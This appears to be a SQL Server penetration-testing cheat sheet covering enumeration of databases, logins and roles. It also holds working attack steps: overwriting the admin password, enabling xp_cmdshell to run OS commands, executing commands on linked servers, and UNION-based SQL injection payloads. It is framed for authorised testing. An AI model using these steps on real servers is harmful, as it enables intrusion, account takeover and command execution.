Basic MSSQL Navigation & Enumeration
🔹 List all databases
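-- sys.databases is the supported catalog view; master..sysdatabases is the
-- deprecated SQL 2000 compatibility view (still present on current versions).
-- Only databases the current login is permitted to see are returned.
SELECT name, database_id, state_desc
FROM sys.databases;
-- Legacy equivalent:
SELECT name FROM master..sysdatabases;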
🔹 List all tables in current database
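-- sys.tables returns only user tables (what sysobjects WHERE type='U' gave).
-- Include the schema: anything outside dbo must be queried as schema.table.
SELECT SCHEMA_NAME(schema_id) AS schema_name, name AS table_name
FROM sys.tables;
-- Portable alternative (INFORMATION_SCHEMA.TABLES also lists views unless
-- filtered on TABLE_TYPE):
SELECT TABLE_SCHEMA, TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE = 'BASE TABLE';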
🔹 List all columns in a table
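-- Replace <table_name> with the real name (pass it as a string if it contains
-- spaces or reserved words, e.g. EXEC sp_columns 'my table').
EXEC sp_columns <table_name>;
-- Or, with the type of each column — useful for UNION-based injection, where
-- every selected value must be type-compatible with the column it lands in:
SELECT TABLE_SCHEMA, COLUMN_NAME, DATA_TYPE, CHARACTER_MAXIMUM_LENGTH
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_NAME = 'users'
ORDER BY ORDINAL_POSITION;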
🔹 Switch database
-- Switches the session's database context. When you cannot change context
-- (e.g. a single injected SELECT), three-part names work from any database:
--   SELECT name FROM <database_name>.sys.tables;
USE <database_name>;
User & Role Enumeration
🔹 Current user and privileges
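-- SYSTEM_USER is the server login (DOMAIN\user for Windows auth);
-- USER_NAME() is the database user that login maps to in the current DB.
SELECT SYSTEM_USER;
SELECT USER_NAME();
-- 1 = member, 0 = not a member, NULL = role or login name is invalid.
SELECT IS_SRVROLEMEMBER('sysadmin');
-- Database-level equivalent:
SELECT IS_MEMBER('db_owner');
-- Effective server-level permissions of the current login (e.g. CONTROL SERVER,
-- ALTER SETTINGS — the latter is what sp_configure / xp_cmdshell enabling needs):
SELECT permission_name
FROM fn_my_permissions(NULL, 'SERVER');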
🔹 List all SQL Server logins
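-- All server principals: SQL logins, Windows logins/groups, server roles and
-- certificate/key-mapped logins. Per the catalog visibility rules, without
-- ALTER ANY LOGIN (or a permission on the login) you only see your own login,
-- sa and the fixed roles — a short list here does not mean few logins exist.
SELECT name, type_desc, is_disabled
FROM master.sys.server_principals
ORDER BY type_desc, name;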
🔹 List users in current DB
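-- sys.database_principals replaces the deprecated sysusers view and exposes
-- the principal type (SQL_USER, WINDOWS_USER, DATABASE_ROLE, ...).
SELECT name, type_desc
FROM sys.database_principals
ORDER BY type_desc, name;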
🔹 List server roles
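-- sys.server_role_members holds only principal IDs; join to
-- sys.server_principals twice to resolve role and member names.
SELECT r.name AS role_name, m.name AS member_name, m.type_desc AS member_type
FROM sys.server_role_members AS srm
INNER JOIN sys.server_principals AS r ON r.principal_id = srm.role_principal_id
INNER JOIN sys.server_principals AS m ON m.principal_id = srm.member_principal_id
ORDER BY r.name, m.name;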
Querying Data
🔹 Select data from a table
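-- Check the row count before dumping: SELECT * on a large table is slow and
-- conspicuous in query monitoring.
SELECT COUNT(*) FROM users;
SELECT * FROM users;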
🔹 Top N results
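-- TOP without ORDER BY returns an arbitrary 10 rows; order on a key so the
-- sample is repeatable between runs.
SELECT TOP 10 * FROM users ORDER BY username;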
🔹 Filtered results
-- Under a case-insensitive collation (the default on most installs) 'Admin'
-- and 'admin' match the same row.
SELECT * FROM users WHERE username='admin';
Modifying Data (destructive — only where the rules of engagement allow it; record original values so every change can be reverted)
🔹 Insert data
-- Inserting rows is noisy (audit, triggers, replication) and leaves artefacts:
-- note the exact row so it can be removed afterwards. The value is stored as
-- given — if the application expects a hash in `password`, this will not log in.
INSERT INTO users (username, password) VALUES ('hacker', 'p@ssw0rd');
🔹 Update data
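-- OUTPUT returns the value being overwritten so the original can be restored
-- after the test. If the column stores a hash, a plaintext literal will not
-- give a working login — look at the existing values first.
UPDATE users
SET password = 'newpass'
OUTPUT deleted.username, deleted.password
WHERE username = 'admin';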
🔹 Delete data
-- Clean-up for the test row inserted above. Never drop the WHERE clause — an
-- unfiltered DELETE empties the table.
DELETE FROM users WHERE username='hacker';
OS Command Execution
🔹 Enable xp_cmdshell (requires the ALTER SETTINGS server permission — in practice sysadmin/serveradmin; the configuration change is logged)
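-- Requires ALTER SETTINGS (sysadmin / serveradmin). Each sp_configure change
-- is written to the SQL Server error log, so this is noisy — check the current
-- state first; it may already be on (value_in_use = 1).
SELECT name, value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell';
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
-- Revert when done (only if it was off to begin with):
--   EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
--   EXEC sp_configure 'show advanced options', 0; RECONFIGURE;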
🔹 Run system commands
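-- Commands run as the SQL Server service account for sysadmins, or as the
-- xp_cmdshell proxy account for non-sysadmins granted EXECUTE on it. Output is
-- returned one row per line with a trailing NULL row. Qualifying with master..
-- works from any database context.
EXEC master..xp_cmdshell 'whoami';
EXEC master..xp_cmdshell 'ipconfig';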
Linked Server Enumeration (Pivoting)
🔹 List linked servers
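EXEC sp_linkedservers;
-- sys.servers adds the details that matter for pivoting: whether RPC Out is
-- enabled (required for EXEC ... AT) and where the link actually points.
SELECT name, product, provider, data_source, is_rpc_out_enabled
FROM sys.servers
WHERE is_linked = 1;
-- Login mapping per link: uses_self_credential = 1 passes the current login
-- through; otherwise remote_name is the fixed remote login used.
SELECT s.name AS linked_server, l.remote_name, l.uses_self_credential
FROM sys.linked_logins AS l
INNER JOIN sys.servers AS s ON s.server_id = l.server_id;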
🔹 Run a command on a linked server (requires RPC Out enabled on the link; runs as the remote login the link maps you to)
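-- EXEC ... AT needs RPC Out enabled on the link and executes as the remote
-- login the link maps you to — confirm who that is with a harmless query
-- before trying anything noisy. Single quotes inside the string are doubled.
EXEC ('SELECT SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')') AT [LINKED_SERVER_NAME];
EXEC ('EXEC xp_cmdshell ''whoami''') AT [LINKED_SERVER_NAME];
-- OPENQUERY does not need RPC Out but only suits pass-through statements that
-- return a result set:
SELECT * FROM OPENQUERY([LINKED_SERVER_NAME], 'SELECT @@VERSION AS version');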
Stored Procedures
🔹 List stored procedures
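-- sys.procedures lists user stored procedures with their schema (sysobjects
-- type 'P' is the deprecated equivalent). Extended procedures and functions
-- are not included.
SELECT SCHEMA_NAME(schema_id) AS schema_name, name, create_date, modify_date
FROM sys.procedures
ORDER BY schema_name, name;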
🔹 Execute stored procedure
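-- Read the definition before running an unknown procedure: it may modify data
-- or shell out via xp_cmdshell. OBJECT_DEFINITION returns NULL if the
-- procedure is encrypted or you lack VIEW DEFINITION on it.
SELECT OBJECT_DEFINITION(OBJECT_ID('my_procedure_name'));
EXEC my_procedure_name;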
Other Useful Queries
🔹 Current database
-- Name of the database the current session is in.
SELECT DB_NAME();
🔹 SQL Server version
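-- Full banner (version, build, edition, OS).
SELECT @@VERSION;
-- The same facts as discrete values, easier to compare against patch levels:
SELECT SERVERPROPERTY('ProductVersion') AS product_version,
       SERVERPROPERTY('ProductLevel') AS product_level,
       SERVERPROPERTY('Edition') AS edition;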
🔹 Get hostname of the SQL Server (note: HOST_NAME() returns the connecting client's machine name, not the server's — use @@SERVERNAME / SERVERPROPERTY('MachineName') for the server)
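-- HOST_NAME() returns the workstation name of the *client* session, not the
-- server. These return the server itself:
SELECT @@SERVERNAME;
SELECT SERVERPROPERTY('MachineName') AS machine_name,
       SERVERPROPERTY('InstanceName') AS instance_name;
-- Client-side name of your own session (how the server sees you):
SELECT HOST_NAME();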
🔹 Get domain and username
SELECT SYSTEM_USER; -- DOMAIN\user for Windows-authenticated logins, the login name for SQL logins
Tip: SQL Injection Friendly Variants
For testing SQLi manually, simpler queries help. Match the column count of the original query first (raise n in `' ORDER BY n -- --` until it errors), then start from all-NULL values, which are compatible with any column type:
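-- Find the column count first: raise n until ORDER BY n errors.
' ORDER BY 3 -- --
-- NULL is compatible with every column type, so the first UNION uses only
-- NULLs; the number of NULLs must equal the column count found above.
' UNION SELECT null, null, null -- --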
Then build up to:
-- Each value must be type-compatible with the corresponding column of the
-- original query or the UNION fails (e.g. a string into an int column); keep
-- NULL in positions whose type is unknown and move a probe value one position
-- at a time.
' UNION SELECT 1, SYSTEM_USER, @@version -- --
